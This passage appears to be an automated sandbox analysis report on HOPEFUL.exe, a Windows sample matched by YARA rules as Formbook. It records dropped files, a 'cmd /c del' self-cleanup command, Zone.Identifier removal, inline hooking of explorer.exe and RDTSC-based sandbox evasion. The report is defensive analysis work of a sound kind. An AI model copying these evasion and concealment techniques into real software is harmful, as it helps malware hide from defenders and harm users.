          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E0B NtReadFile,19_2_00ED9E0B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9F3A NtAllocateVirtualMemory,19_2_00ED9F3A
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F1359C CreateProcessAsUserW,0_2_02F1359C
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F118980_2_02F11898
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F111680_2_02F11168
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F048A20_2_02F048A2
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F063AB0_2_02F063AB
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F12E780_2_02F12E78
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F12A000_2_02F12A00
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_016499C10_2_016499C1
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164BBE80_2_0164BBE8
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164A4B90_2_0164A4B9
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_01643F900_2_01643F90
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164F6180_2_0164F618
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164EE1A0_2_0164EE1A
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164D6AA0_2_0164D6AA
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_016476B00_2_016476B0
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164F6080_2_0164F608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D8D25_2_0041D8D2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041E1975_2_0041E197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D3135_2_0041D313
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409E405_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D63C5_2_0041D63C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409E3F5_2_00409E3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041DF975_2_0041DF97
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041DFAA5_2_0041DFAA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00DE20505_2_00DE2050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018425815_2_01842581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E25DD5_2_018E25DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182D5E05_2_0182D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181F9005_2_0181F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2D075_2_018E2D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01810D205_2_01810D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018341205_2_01834120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1D555_2_018E1D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B0905_2_0182B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A05_2_018420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E20A85_2_018E20A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E28EC5_2_018E28EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D10025_2_018D1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182841F5_2_0182841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184EBB05_2_0184EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DDBD25_2_018DDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1FF15_2_018E1FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2B285_2_018E2B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E22AE5_2_018E22AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2EF75_2_018E2EF7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01836E305_2_01836E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A019_2_04E120A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB09019_2_04DFB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF841F19_2_04DF841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA100219_2_04EA1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFD5E019_2_04DFD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1258119_2_04E12581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB1D5519_2_04EB1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0412019_2_04E04120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEF90019_2_04DEF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE0D2019_2_04DE0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E06E3019_2_04E06E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1EBB019_2_04E1EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDE19719_2_00EDE197
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2D8719_2_00EC2D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2D9019_2_00EC2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC9E4019_2_00EC9E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC9E3F19_2_00EC9E3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDDFAA19_2_00EDDFAA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2FB019_2_00EC2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDDF9719_2_00EDDF97
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0181B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04DEB150 appears 32 times
          Source: HOPEFUL.exeBinary or memory string: OriginalFilename vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.296333169.0000000003121000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs HOPEFUL.exe
          Source: HOPEFUL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@4/3
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: HOPEFUL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HOPEFUL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: HOPEFUL.exeReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\HOPEFUL.exe 'C:\Users\user\Desktop\HOPEFUL.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HOPEFUL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HOPEFUL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: HOPEFUL.exeStatic file information: File size 3437056 > 1048576
          Source: HOPEFUL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x346600
          Source: HOPEFUL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F005E6 pushfd ; iretd 0_2_02F00613
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F04E9A push es; iretd 0_2_02F05094
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F04B71 push es; iretd 0_2_02F05094
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F00A2A push ds; ret 0_2_02F00A51
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CEB5 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF6C push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF02 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF0B push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0186D0D1 push ecx; ret 5_2_0186D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E3D0D1 push ecx; ret 19_2_04E3D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDD856 push esi; ret 19_2_00EDD859
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCEB5 push eax; ret 19_2_00EDCF08
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF6C push eax; ret 19_2_00EDCF72
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF0B push eax; ret 19_2_00EDCF72
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF02 push eax; ret 19_2_00EDCF08
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile opened: C:\Users\user\Desktop\HOPEFUL.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000EC98E4 second address: 0000000000EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000EC9B5E second address: 0000000000EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Users\user\Desktop\HOPEFUL.exeThread delayed: delay time: 922337203685477Jump to behavi